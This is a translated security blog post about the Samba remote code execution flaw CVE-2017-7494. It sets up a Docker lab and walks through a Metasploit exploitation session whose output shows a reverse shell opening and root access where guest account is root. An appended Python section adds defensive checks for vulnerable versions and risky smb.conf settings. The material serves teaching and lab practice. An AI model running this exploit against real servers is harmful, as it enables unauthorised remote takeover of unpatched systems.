Samba Remote Code Execution Vulnerability (CVE-2017-7494), with Lab Environment


Copyright notice:

This article was first published on the WeChat account inn0team.

The copyright of this article belongs to inn0team.

Reproductions must keep this notice; violators will be held responsible.

Vulnerability Details

On 24 May 2017 Samba released version 4.6.4, which fixes a serious remote code execution vulnerability, CVE-2017-7494. The vulnerability affects every Samba version from 3.5.0 onward up to the fixed releases 4.6.4/4.5.10/4.4.14.

Lab Image

Getting the environment:

Pull the image to the local machine:

    $ docker pull medicean/vulapps:s_samba_1

Start the environment:

    $ docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1

In -p 445:445, the first 445 is the port on the host machine.

Exploitation Steps

Assume the target IP is 192.168.35.197.

    msf > use exploit/linux/samba/is_known_pipename
    msf exploit(is_known_pipename) > set RHOST 192.168.35.197
    RHOST => 192.168.35.197
    msf exploit(is_known_pipename) > show options

    Module options (exploit/linux/samba/is_known_pipename):

      Name            Current Setting  Required  Description
      ----            ---------------  --------  -----------
      RHOST           192.168.35.197   yes       The target address
      RPORT           445              yes       The SMB service port (TCP)
      SMB_FOLDER                       no        The directory to use within the writeable SMB share
      SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name
      SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory

    Exploit target:

      Id  Name
      --  ----
      2   Linux x86_64

    msf exploit(is_known_pipename) > run

    [*] Started reverse TCP handler on 192.168.35.197:4444
    [*] 192.168.35.197:445 - Using location \\192.168.35.197\share for the path
    [*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so
    [*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...
    [*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...
    [*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

    id
    uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

If smb.conf sets guest account = root, the shell instead reports:

    id
    uid=0(root) gid=0(root) groups=0(root)
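As an added example that is not part of the original post, the Python helper below turns the affected-version range stated above and the smb.conf point just made into triage checks a defender can run over an inventory: is_vulnerable() classifies a Samba version string against the 3.5.0 to 4.4.14/4.5.10/4.6.4 range, and risky_settings() flags guest account = root, a writable guest-accessible share (the precondition the module's options describe), and a missing nt pipe support = no. That last setting is the workaround from the Samba advisory and is an assumption beyond what the post itself states.

```python
# Added example, not from the original post: CVE-2017-7494 triage helpers.
# is_vulnerable() checks a Samba version against the range the post quotes
# (3.5.0 up to, but not including, 4.4.14 / 4.5.10 / 4.6.4); risky_settings()
# flags smb.conf lines that raise the impact: the post's "guest account = root",
# a writable guest share, and a missing "nt pipe support = no" (the Samba
# advisory's workaround; an assumption, since the post does not mention it).
import re
FIXED = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}

def parse_version(text):
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)  # e.g. "Version 4.5.9-Ubuntu"
    if not m:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(p) for p in m.groups())

def is_vulnerable(version):
    v = parse_version(version)
    if v < (3, 5, 0):  # first affected release named in the post
        return False
    fixed = FIXED.get(v[:2])
    if fixed is None:  # 3.5 .. 4.3 got no fix; anything after 4.6 shipped fixed
        return v[:2] < (4, 4)
    return v < fixed

def parse_smb_conf(text):
    # Minimal reader: {section: {key: value}}; '#'/';' comments stripped, values lowercased.
    conf, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            conf[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            conf[current][key.strip().lower()] = value.strip().lower()
    return conf

def risky_settings(text):
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    checks = [("guest account = root", glob.get("guest account") == "root"),
              ("nt pipe support not disabled", glob.get("nt pipe support", "yes") != "no")]
    findings = [msg for msg, hit in checks if hit]
    for name, opts in conf.items():
        writable = "yes" in (opts.get("writable"), opts.get("writeable")) or opts.get("read only") == "no"
        if name != "global" and writable and opts.get("guest ok") == "yes":
            findings.append("writable guest share [%s]" % name)
    return findings
```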

Further Reading

  • https://github.com/rapid7/metasploit-framework/pull/8450
  • http://blogs.360.cn/blog/samba%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9Ecve-2017-7494%E5%88%86%E6%9E%90/
